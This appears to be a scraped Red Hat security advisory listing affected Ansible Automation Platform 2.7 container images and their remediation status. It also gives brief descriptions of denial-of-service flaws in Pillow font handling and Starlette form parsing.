| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library's font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — | ||
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
A flaw was found in Starlette where the request.form() method silently ignores configured resource limits (max_fields and max_part_size) when parsing application/x-www-form-urlencoded data. An unauthenticated attacker can exploit this by sending a urlencoded request body with an arbitrarily large number of fields or an oversized field, causing denial of service through resource exhaustion.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — |
Workaround
|
|
